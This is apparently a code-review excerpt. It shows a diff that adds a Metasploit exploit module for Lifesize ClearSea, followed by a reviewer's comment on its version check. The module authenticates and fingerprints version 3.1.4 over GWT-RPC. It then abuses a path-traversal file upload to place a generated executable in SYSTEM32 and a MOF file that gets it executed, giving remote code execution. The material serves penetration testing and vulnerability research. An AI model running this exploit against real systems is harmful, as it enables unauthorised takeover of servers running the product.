modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb

```diff
@@ -0,0 +1,185 @@
+    true
+  end
+
+  def upload(file_path, contents)
+    boundary = rand_text_alpha(30)
+    body = []
+    body << "\r\n--#{boundary}\r\n"
+    body << "Content-Disposition: form-data; name=\"SmartGuiUploadField\"; filename=\"#{rand_text_alpha(5)}.txt\"\r\n"
+    body << "Content-Type: text/plain\r\n\r\n"
+    body << contents
+    body << "\r\n\r\n--#{boundary}--\r\n"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('smartgui', 'upload', '-m-ClearSea-c-DHP_PKG_UPLOAD_FORM-w-filename', rand_text_alpha(10), file_path),
+      'ctype' => "multipart/form-data, boundary=#{boundary}",
+      'cookie' => @cookie,
+      'data' => body.join
+    })
+  end
+
+  def exploit
+    unless CheckCode::Vulnerable == check
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    print_status("Generating .exe payload...")
+    exe_name = "#{rand_text_alpha(5..10)}.exe"
+    exe_content = generate_payload_exe
+    exe_file_path = "#{traversal}WINDOWS\\SYSTEM32\\#{exe_name}"
+    print_status("Uploading .exe payload #{exe_name}...")
+    upload(exe_file_path, exe_content)
+    register_file_for_cleanup(exe_name)
+
+    print_status("Generating .mof file...")
+    mof_name = "#{rand_text_alpha(5..10)}.mof"
+    mof_content = generate_mof(mof_name, exe_name)
+    mof_file_path = "#{traversal}WINDOWS\\SYSTEM32\\WBEM\\MOF\\#{mof_name}"
+    print_status("Uploading .mof file #{mof_name}...")
+    upload(mof_file_path, mof_content)
+    register_file_for_cleanup("WBEM\\MOF\\GOOD\\#{mof_name}")
+  end
+
+  def check
+    unless login(datastore['USER'], datastore['PASS'])
+      return CheckCode::Unknown
+    end
+
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri('smartgui', 'sessionService'),
+        'ctype' => 'text/x-gwt-rpc; charset=utf-8',
+        'cookie' => @cookie,
+        'data' => '5|0|4|||com.manthia.gui.metadata.client.SessionService|beginSession|1|2|3|4|0|'
+      })
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      return CheckCode::Unknown
+    end
+
+    session_token = res.body.scan(/"([^"]*)"/)[8].first
+    vprint_status("Obtained smartgui session token #{session_token}")
+
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri('smartgui', 'formService'),
+        'ctype' => 'text/x-gwt-rpc; charset=utf-8',
+        'cookie' => @cookie,
+        'data' => "5|0|7|||com.manthia.gui.metadata.client.FormService|load|java.lang.String|#{session_token}|-m-ClearSea-c-SYSTEM_STATUS_FORM|1|2|3|4|2|5|5|6|7|"
+      })
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      return CheckCode::Unknown
+    end
+
+    if res && res.body.include?('3.1.4')
+      return CheckCode::Vulnerable
```

Comment:
`CheckCode::Appears` would be more appropriate.

Also, are other versions vulnerable?